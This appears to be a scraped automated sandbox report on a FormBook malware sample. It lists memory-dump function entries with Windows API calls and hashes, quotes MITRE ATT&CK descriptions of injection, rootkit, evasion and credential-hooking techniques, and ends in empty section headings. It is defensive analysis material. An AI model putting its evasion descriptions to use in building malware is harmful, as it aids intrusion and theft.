Function 02F182E9, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F1834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F1836B

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afe3215ff52b146ceb92c91ebcf877d2f54adfa7a90696fbb0ace2023f207f81
Instruction ID: 5b8e27b28e8a087519139ba58817e3e9ff36228a8b14e373b4258e3dfca27766
Opcode Fuzzy Hash: afe3215ff52b146ceb92c91ebcf877d2f54adfa7a90696fbb0ace2023f207f81
Instruction Fuzzy Hash: D501FE31E402287AF72196649D02FFE7B586B01BD5F494159FF04BA1C1E7D4650546E1

Uniqueness

Uniqueness Score: -1.00%

Function 02F182F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F1834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F1836B

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
Instruction ID: 4797cb6a109ce4fb093a0248e44d296289e5b4db117535873a7ea5fad4d6251b
Opcode Fuzzy Hash: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
Instruction Fuzzy Hash: 6D01F231A802287BF720A6949D02FFF772CAB01B90F150018FF04BA1C0E6D46A0A4AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02F1ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.USER32(00000000,00000000,00000003,?), ref: 02F1AD42

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: c9b8adf15bc222a034e1d1002a09324fbd20158ead8e0c5f2d6ae625ac4d84fd
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: D8015EB5D0020DABDF10EBA4DC41F9DB3799B14348F004195AA0997240F630E708CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A205, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1F1A2,02F1F1A2,?,00000000,?,?), ref: 02F2A200

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 4cd4447cc9e4190945b51b445db596ba1f7c746bfffd33c8124ec427945fbddf
Instruction ID: 9e0de5e489f9e31de0d1867776e87ce069034bc6d7f6631a1a09fc449ffe4367
Opcode Fuzzy Hash: 4cd4447cc9e4190945b51b445db596ba1f7c746bfffd33c8124ec427945fbddf
Instruction Fuzzy Hash: 05F022B51083846FDB10EF68DC80DD77BAAEF82310F14885DF89A57602C630E918CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F2A134

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: d91531348a7d211b93d3df8fadb77e0c96cd1da3175ff93f1a5174f76a04165f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A0A5, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.USER32(02F24506,?,02F24C7F,02F24C7F,?,02F24506,?,?,?,?,?,00000000,00000000,?), ref: 02F2A05D

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a98cdde78e4bc62ed93999ed30d95ffa9b1c8da5be641f0cafa2f35e3935c827
Instruction ID: 6286e86c170a16bff00475ae1d695e3a4bb003272c747cd91be199d438354194
Opcode Fuzzy Hash: a98cdde78e4bc62ed93999ed30d95ffa9b1c8da5be641f0cafa2f35e3935c827
Instruction Fuzzy Hash: 12E0E5712142147BD224EB99DC80ED7735EEF88790F118555FA4CA7641C931A90486E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A1C2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1F1A2,02F1F1A2,?,00000000,?,?), ref: 02F2A200

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0e62d78dd945a92ade2747077d1fe2cdf293be64817f4f8006fc05a23c45d1a7
Instruction ID: 9d43f38b014ba94a5cffdff846f51bfb78f31cdfc815b24a386486cc2841e703
Opcode Fuzzy Hash: 0e62d78dd945a92ade2747077d1fe2cdf293be64817f4f8006fc05a23c45d1a7
Instruction Fuzzy Hash: 9DE0EDB02442246BCB14EF58DC81E973BACEF45660F108A59FC899B242C234E8068BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02F29972, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

SetMagnificationDesktopColorEffect.USER32(001F0001,?,00000206,02F1F324,00000206,?,001F0001,?,00000000), ref: 02F299B1

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: ColorDesktopEffectMagnification
String ID:
API String ID: 2656993766-0
Opcode ID: 658f6074dfb92d6e4ea506ccb0c43739d771b0f56acb1443ec90de8c49080327
Instruction ID: 70b05f1ac240baeb67a7e5b398b1047e843433f41566e29940ddf7d82e1c10ad
Opcode Fuzzy Hash: 658f6074dfb92d6e4ea506ccb0c43739d771b0f56acb1443ec90de8c49080327
Instruction Fuzzy Hash: 6BF039B5600208AFDB04DF89DC85EE777E8EF98654F158089F918AB242C630EA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F29980, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetMagnificationDesktopColorEffect.USER32(001F0001,?,00000206,02F1F324,00000206,?,001F0001,?,00000000), ref: 02F299B1

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: ColorDesktopEffectMagnification
String ID:
API String ID: 2656993766-0
Opcode ID: 4f971f71f869949e99f925280306ad068c1036b3c7f50cce473518fb1ab6f422
Instruction ID: c83d908ce45b1946404178dc412dfcf6e37e461df62391c134a890387f1efe9f
Opcode Fuzzy Hash: 4f971f71f869949e99f925280306ad068c1036b3c7f50cce473518fb1ab6f422
Instruction Fuzzy Hash: 4FE01AB5200218AFDB14DF89CC85EE777ADEF88B50F118558BA18A7241C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.USER32(02F24506,?,02F24C7F,02F24C7F,?,02F24506,?,?,?,?,?,00000000,00000000,?), ref: 02F2A05D

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: e77ae633dbd87f88b6bb237d1d01ea3f8d45bd729e5b0e3bfdf2f503b8cfc094
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: FCE046B1200218ABDB14EF99CC80EA777ADEF88B50F118558FE086B241C630F914CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1F1A2,02F1F1A2,?,00000000,?,?), ref: 02F2A200

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 90002a6b062b0f0f3dd01046442a0fddfca44876f1fdf9f25bd6da7a022ba4ba
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F4E01AB12002186BDB10DF49CC84EE737ADEF89650F018154BA0867241C930E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02F1F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02F18CF4,?), ref: 02F1F6CB

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3159bd470a4f84756fad5da23d97827c79392872e8984958f23754e4ed9632c4
Instruction ID: 5794bdaf975d8fcbebcafd65daecd0bff27251b52d1196ad9ead9f3a8fb77259
Opcode Fuzzy Hash: 3159bd470a4f84756fad5da23d97827c79392872e8984958f23754e4ed9632c4
Instruction Fuzzy Hash: 45D02E32B903003BFA00EAA89C02F26328A9B0A760F4801A4FB48DB3D7E950D9004920

Uniqueness

Uniqueness Score: -1.00%

Function 02F1F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02F18CF4,?), ref: 02F1F6CB

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 9d67f47bbd5497ba43cd9568a5b8f1489e353dc1f407cf9f1ba4fa8f28746afe
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: C8D0A7717903043BF610FBA49C03F2732CD5B55B44F490064FB48D73C3D950E0004965

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 9thuIDnsFV

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets